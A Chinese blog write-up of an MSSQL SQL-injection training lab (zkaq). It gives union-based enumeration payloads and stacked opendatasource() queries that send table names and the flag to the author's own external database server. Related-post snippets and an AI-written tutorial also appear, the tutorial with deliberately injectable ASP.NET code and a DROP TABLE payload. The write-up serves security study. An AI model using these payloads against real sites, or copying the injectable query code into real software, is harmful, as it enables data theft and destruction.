MSSQL-反弹注入(zkaq靶场)

最新推荐文章于 2024-08-20 21:23:42 发布
最新推荐文章于 2024-08-20 21:23:42 发布
阅读量3.5k 收藏 2
点赞数 4
CC 4.0 BY-SA版权
分类专栏: web知识 文章标签: sqlserver 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52585514/article/details/124498510
本文介绍如何通过联合查询注入法在MSSQL中猜解字段、数据类型并利用sysobjects和syscolumns获取表信息,以及反弹注入技术利用opendatasource函数导入数据进行数据库操作,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MSSQL就是sql server 他跟mysql进行注入的方式有所不同

这里写两种方法

1.联合查询注入

首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充

首先来猜字段

order by 3时正确,order by 4时错误

所以字段数为3
在这里插入图片描述

然后进行猜数据类型。先

?id=1’ union all select NULL,NULL,NULL – qwe
在这里插入图片描述

回显正常

挨个测试数据类型

?id=1’ union all select 1,‘w’,‘w’ – qwe

猜测得出数据类型为,int ,char,char
在这里插入图片描述

然后进行查询系统表,mssql的系统表是sysobjects,里面包含了数据库中的所有表

其中只有三个字段: id,name,xtype 刚好对应靶场中的int,char,char的数据类型。

其中xtype只有两个参数,S和U

S代表系统自带表,U代表用户自建表

?id=1’ union all select id,name,NULL from sysobjects where xtype=‘U’ – qwe

得到
在这里插入图片描述

其中id对应的是这个表的id,name就是这个表的名字

然后记住表的id,来查询这个表的字段名

这个id是用来连接syscolumns表的

syscolumns表的结构跟sysobjects是不一样的

?id=1’ union all select NULL,name,NULL from syscolumns where id=1977058079 – qwe

得到
在这里插入图片描述

flag多半是在token

然后就是正常的查询了

?id=1’ union all select NULL,NULL,token from admin – qwe
在这里插入图片描述

得到flag

2.反弹注入

利用数据外带的方式来进行注入,就是将数据库的插入的自己的数据库里

但是首先你要有公网ip和mssql服务器

可以去香港云(http://www.webweb.com/)注册,60天免费

这里利用opendatasource()函数

语法:
OPENDATASOURCE(provider_name,init_string)

provider_name 注册为用于访问数据源的OLE DB 提供程序的PROGID的名称 MSSQL的名称为SQLOLEDB

init_string 连接字符串 连接地址、端口、用户名、密码、数据库名 server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称
即:
opendatasource(‘sqloledb’,‘server=连接地址,连接端口;uid=用户名;pwd=密码;database=库名’).库名.权限(dbo).表名 <查询语句>

但是想要导出的记录要和自己建的导入的表的字段数相同

数据库端口默认为1433

然后传到自己建好的数据库服务器内
要使用堆叠注入,mssql以’;'号为结束,遇到;后开始新的语句

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.zhiyuan select id,name from sysobjects where xtype=‘U’ – qew

在自己的数据库里得到
在这里插入图片描述

然后再用相同的方法得到字段名

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.temp select id,name from syscolumns where id=1977058079 – qew

得到
在这里插入图片描述

好,然后查询就行了

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.temp select NULL,token from admin – qwe

得到flag
在这里插入图片描述

MSSQL反弹注入靶场
weixin_45540609的博客
04-21 638
方法1——报错注入 查找sql注入点 2'order by 4 -- asd,知道字段数有3个,且有一个数据表叫news 2' union all select 1,'aaa','bbb' from news -- asd 联合查询注入发现第2,3个字段是字符类型 2' union all select id,name,null from sysobjects where xtype='U' -- asd 2' union all select id,name...
MSSQL-反弹注入
weixin_45634365的博客
03-04 424
一、MSSQL反弹注入的使用场景 MSSQL其实就是SQLServerMSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,造就了新颖独特的攻击思路。 在注入攻击中常常遇到这些问题: (1)明明是SQL的注入点却无法注入 (2)注入工具猜解的速度异常缓慢 (3)错误提示信息关闭 (4)无法返回注入结果 为了解决上述问题,比较好的方法是使用反弹注入技术。 反弹注入:将查询到的数据插入到其他数据库,可以复制大量的数据。 二、快速搭建一个MSSQL环境 MSSQ
[zkaq靶场]SQL注入--MSSQL反弹注入
wwxxee
05-08 499
MSSQL反弹注入 使用场景 明明是SQL注入点,但是使用工具注入缓慢,或者错误提示信息关闭,无法返回注入结果等。较好的解决办法就是使用反弹注入。 核心 反弹注入的核心就是opendatasouce()函数。 将查询的数据结果插入到我们自己的数据库中。 opendatasource 为了方便理解,可以看理解为 ‘使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。 语法: OPENDATASOURCE(provider_name,init_string) provider_n
mssql反弹注入
笔墨稠思
11-25 456
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
MSSQL--反弹注入
qq_68233961的博客
08-15 292
MSSQL--反弹注入
封神台MSSQL注入 - 反弹注入
qq_40941912的博客
10-05 308
一、作业 MSSQL注入 - 反弹注入 (Rank: 5) 判断页面是否存在注入:’ and 1=2 – qwe.页面不正常 判断输出位个数:‘ order by 3 — qwe,3个输出位. 输出位输出: 错误原因:MSSQL对输出位数据很严格.应该: ‘ union select 5,null,null — qwe 正常,说明第一个输出字段为整数. ‘union select 5,’a’,’a’ — qwe 说明第2,3字段为字符串. 对MMSQL猜表名: MMSQL的自带数据
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 512
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
18、注入--反弹注入MSSQL
WX公众号-小白学安全
04-10 836
MSSQL MSSQL基础 MSSQL是指微软的SQLServer数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库注入条件
MSSQL SQLi Labs 手工注入靶场
2301_82061181的博客
08-20 1019
less-1步骤一:判断注入方式 ?id=1' --+步骤二:判断后台是否是MYSQL数据库?id=1' and exists(select * from sysobjects) --+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1' union select 1,user,is_srvrolemember('public'); --+步骤四:查询表名第一张表:?id=-1'and (select top 1 cast (name as varchar
MSSQL注入——反弹注入
m0_55854679的博客
02-18 972
文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
MSSQL注入反弹注入
qq_58000413的博客
09-21 779
database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin。database=数据库名 ').数据库名.dbo.字段 (字段可以多个,逗号隔开)反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(select * from syscolumns where id='前面查到的id值'
MSSQL⼿⼯注⼊——MSSQLILABS靶场
A2893992091的博客
08-20 419
返回结果为空,说明不存在第五张表。猜测出一张表‘users’
MSSQL SQLi Labs靶场手工注入
2401_82451607的博客
08-20 1053
mssql靶场手工注入
网络安全从入门到精通(第六章-4)MSsql注入 —— 反弹注入
划水的小白白
02-05 2092
本文内容: ~MSSQL反弹注入使用场景 ~快速搭建一个MSSQL环境(骚姿势) ~MSSQL反弹注入语句解析 ~MSSQL实战注意
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 263
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
数据库注入学习笔记3---MSSQ注入(反弹注入)
qq_41759633的博客
08-07 620
引:MSSQL注射攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路,而反弹注入技术需要依靠opendatasource函数支持 opendatasource:‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’ 攻击过程: 攻击前准备: 首先需要在攻击者主机的SQL server 2000...
MSSQLILABS靶场
qq_45079558的博客
08-20 386
1,把msssql注入靶场压缩包解压仿佛靶场根目录下。2将config.asp的内容改为以下的数据库连接语句。查表test -D test。将网址输入到sqlmap去检测。1,寻找注入点,字符串后。得到users表中的数据。访问IIS绑定的首页。sqlmap工具注入
mssql-sqli-labs靶场搭建
最新发布
03-21
<think>好的,用户想了解如何搭建MSSQL SQL注入练习靶场,也就是类似SQLi Labs但基于MSSQL的环境。我需要先整理搭建的基本步骤,确保涵盖环境准备、数据库设置、漏洞代码示例以及安全隔离措施。 首先,环境配置需要安装MSSQL服务器。考虑到用户可能是开发者或学生,可能使用Windows系统,但Docker可能更方便。所以应该包括两种方法:Windows本地安装和Docker部署。对于Docker,需要提供拉取镜像和运行容器的命令,以及修改SA密码的步骤。 接下来是创建数据库和用户。需要指导用户使用SQL Server Management Studio (SSMS)或者命令行工具来创建数据库,比如sqli_labs,然后建立用户并赋予权限。这里要注意安全,避免使用过高权限的账户,但练习环境中可能需要放宽权限以便演示漏洞。 然后,设计漏洞场景是关键。用户需要具体的示例,比如基于错误的注入和联合查询注入。要提供建表语句,插入测试数据,并编写后端代码(如ASP.NET)连接数据库,并展示存在漏洞的查询。代码部分要注明不安全的地方,比如直接拼接用户输入,同时给出修复建议,比如参数化查询。 安全隔离方面,必须强调在虚拟机或隔离环境中搭建,避免暴露在公网。提醒用户不要在生产环境中使用这种配置,确保练习环境与真实网络隔离。 参考现有的引用内容,用户提供的引用涉及SQL注入相关的查询,比如通过information_schema获取表结构,这可能与示例中的漏洞利用有关。需要确保示例中的代码能够模拟这些注入场景,让用户能够练习类似的注入手法。 最后,生成相关问题时要围绕搭建步骤的细节、常见漏洞类型、安全措施和调试方法,帮助用户深入理解每个环节可能出现的问题和解决方案。</think>### 逐步教程:搭建MSSQL SQL注入练习靶场 #### 一、环境准备 1. **安装MSSQL Server** - **Windows系统**:从微软官网下载SQL Server Developer Edition(免费)并安装 - **Docker部署**(推荐隔离环境): ```bash docker pull mcr.microsoft.com/mssql/server:2019-latest docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=YourStrong@Passw0rd" -p 1433:1433 --name mssql -d mcr.microsoft.com/mssql/server:2019-latest ``` 修改`SA_PASSWORD`为高强度密码,避免外网暴露[^1]。 2. **安装管理工具** - 使用 **SQL Server Management Studio (SSMS)** 连接本地或远程数据库--- #### 二、创建漏洞数据库 1. **新建数据库** 在SSMS中执行: ```sql CREATE DATABASE sqli_labs; USE sqli_labs; ``` 2. **创建用户表并插入测试数据** ```sql CREATE TABLE users ( id INT PRIMARY KEY, username VARCHAR(50), password VARCHAR(50) ); INSERT INTO users VALUES (1, 'admin', 'p@ssw0rd'), (2, 'user1', '123456'); ``` 3. **添加其他漏洞场景表**(如订单表、日志表) ```sql CREATE TABLE orders ( order_id INT, product VARCHAR(100), user_id INT ); ``` --- #### 三、编写漏洞代码(以ASP.NET为例) 1. **不安全查询示例(错误注入)** ```csharp string userId = Request.QueryString["id"]; string query = "SELECT * FROM users WHERE id = " + userId; // 直接拼接输入 SqlCommand cmd = new SqlCommand(query, connection); ``` 此代码允许输入如`1; DROP TABLE users--`的攻击载荷[^2]。 2. **联合查询注入漏洞** ```csharp string search = Request.QueryString["q"]; string query = "SELECT * FROM products WHERE name LIKE '%" + search + "%'"; ``` 攻击者可构造`' UNION SELECT id, password FROM users--`泄露敏感数据[^3]。 --- #### 四、安全隔离配置 1. **网络隔离** - 使用虚拟机或Docker网络隔离靶场环境,禁用公网访问。 - 在防火墙中限制仅本地访问端口`1433`。 2. **权限控制** ```sql CREATE LOGIN test_user WITH PASSWORD = 'WeakPassword'; USE sqli_labs; CREATE USER test_user FOR LOGIN test_user; GRANT SELECT ON users TO test_user; -- 仅授权必要权限 ``` --- #### 五、验证漏洞场景 1. **基于错误的注入测试** 访问URL:`http://localhost:8080/product.aspx?id=1'` 若返回数据库错误信息(如`Incorrect syntax near '1''`),说明存在漏洞[^4]。 2. **联合查询测试** ```sql ' UNION SELECT 1, username, password FROM users-- ``` 观察页面是否返回用户凭据。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值